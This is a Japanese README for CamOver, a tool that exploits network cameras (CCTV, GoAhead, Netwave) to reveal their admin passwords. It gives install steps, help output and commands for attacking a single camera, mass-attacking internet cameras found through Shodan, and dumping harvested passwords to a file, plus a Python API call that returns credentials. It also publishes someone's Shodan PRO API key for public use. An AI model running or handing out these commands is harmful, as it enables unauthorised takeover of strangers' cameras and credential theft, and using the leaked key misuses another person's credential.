CamOverは、ネットワークカメラの管理者パスワードを開示できるカメラエクスプロイトツールです。
CCTV、GoAhead、Netwaveなど、最も人気のあるカメラモデルの脆弱性を悪用します。pip3 install git+https://github.com/EntySec/CamOver
CamOverを使用するには、ターミナルでcamoverと入力するだけです。
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.
optional arguments:
-h, --help show this help message and exit
-t, --threads Use threads for fastest work.
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
単一カメラの悪用
ちょっとした楽しみのために私のカメラをハッキングしてみましょう。
camover -a 192.168.99.100
インターネット上のカメラの悪用
Shodan検索エンジンを使ってインターネット上のカメラを悪用してみましょう。高速な悪用のために-tを使用します。
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注記: 上記のShodan APIキー(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)は私のPRO APIキーです。このキーまたはご自身のキーを使用でき、すべてのリソースを無料で自由にご利用いただけます :)
入力ファイルからのカメラの悪用
高速な悪用のために-tを使用して、公開されているカメラデータベースを利用してみましょう。
camover -t -i cameras.txt -o passwords.txt
注記: これにより、cameras.txtリスト内のすべてのカメラがアドレスによって悪用され、取得されたすべてのパスワードがpasswords.txtに保存されます。
CamOverには独自のPython APIもあり、コードにCamOverをインポートすることで呼び出すことができます。
from camover import CamOver
指定されたカメラを悪用するために使用できる、すべてのCamOver基本関数です。
exploit(address) - 指定されたアドレスの単一カメラを悪用します。単一カメラの悪用
from camover import CamOver
camover = CamOver()
creds = camover.exploit('192.168.99.100')
print(creds)